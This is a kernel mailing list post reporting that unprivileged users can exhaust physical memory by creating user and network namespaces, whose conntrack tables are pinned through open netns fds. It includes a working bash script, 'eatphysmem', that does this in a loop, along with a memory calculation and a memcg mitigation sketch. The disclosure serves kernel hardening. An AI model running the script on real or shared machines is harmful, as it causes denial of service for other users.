Date:	Wed, 02 Mar 2016 23:38:11 +0300
From:	yumkam@...il.com (Yuriy M. Kaminskiy)
To:	netdev@...r.kernel.org
Subject: [q] userns, netns, and quick physical memory consumption by unprivileged user

While looking at 759c01142a5d0f364a462346168a56de28a80f52, I remembered the
infamous
    nf_conntrack: falling back to vmalloc
message that was often triggered by network namespace creation (the message
was removed recently, but that changed nothing about the underlying problem).

So, how about something like this:

$ cat << 'EOF' > eatphysmem
#!/bin/bash -xe
fd=6
d="`mktemp -d /tmp/eatmemXXXXXXXXX`"
cd "$d"
rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
# rule="$rule;$rule"
# ... just because we can; same with any number of ip ro/ru/etc
while :; do
#for i in {1..1024}; do
    let fd=fd+1
    if [ -e /proc/$$/fd/$fd ]; then continue;fi
    mkfifo f1 f2
    unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r <f2" &
    pid=$!
    read r <f1
    eval "exec $fd</proc/$pid/ns/net"
    echo bar >f2
    wait
    rm f2 f1
    sleep 1s
done
sleep inf
EOF
$ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
?

You can easily eat ~0.5M of physical memory per netns (the conntrack hash
table alone: hashsize * sizeof(list_head)) and more, and pin all of it to a
single process with open netns fds.
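The pinning half of this is just fd semantics; here is a minimal, harmless demonstration that pins the current shell's own netns instead of an unshare'd one, so it runs unprivileged:

```shell
# A netns stays alive while any open fd references its /proc/<pid>/ns/net
# file. The script above takes such fds on namespaces created by unshare;
# here we take one on our own netns just to show the mechanism.
exec 6< "/proc/$$/ns/net"          # take a reference on the netns
readlink /proc/self/fd/6           # prints e.g. net:[4026531969]
exec 6<&-                          # close the fd; the reference is dropped
```

While fd 6 is open, the namespace (and everything allocated for it) cannot be freed, no matter what happens to the process that created it.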
What can stop it?
ulimit? Which ulimit? Conntrack knows nothing about rlimits.
Ah, `ulimit -n`? That's 64k. 64k * 512k = 32G. Per process. Oh-uh.
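Spelled out (assuming, for illustration, a conntrack hashsize of 65536 buckets of 8 bytes each; the real hashsize is derived from RAM size and varies by kernel):

```shell
# Per-netns conntrack hash table: hashsize * sizeof(list head entry)
per_ns=$((65536 * 8))
echo "$per_ns"                 # 524288 bytes, i.e. 0.5M
# One process may hold up to `ulimit -n` = 64k open netns fds:
total=$((65536 * per_ns))
echo "$((total >> 30))G"       # 32G, pinned by a single unprivileged process
```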
The OOM killer? But this is not that process's memory; if anything, it will
be killed last.
(I wonder whether memcg can tackle it; probably yes, but how many people
have it configured?)
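For the record, a cgroup-v1 sketch of what "having memcg configured" could mean here; the mount path, group name, and the kmem knob are assumptions about the setup, and conntrack tables are kernel memory, so a plain user-memory limit alone would not account for them:

```shell
# Assumes the v1 memory controller is mounted at /sys/fs/cgroup/memory and
# kernel memory accounting (CONFIG_MEMCG_KMEM) is enabled; run as root.
mkdir /sys/fs/cgroup/memory/untrusted
# Cap kernel-memory allocations for the group:
echo $((64 << 20)) > /sys/fs/cgroup/memory/untrusted/memory.kmem.limit_in_bytes
# Move the untrusted shell into the group before it starts unsharing:
echo "$$" > /sys/fs/cgroup/memory/untrusted/cgroup.procs
```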
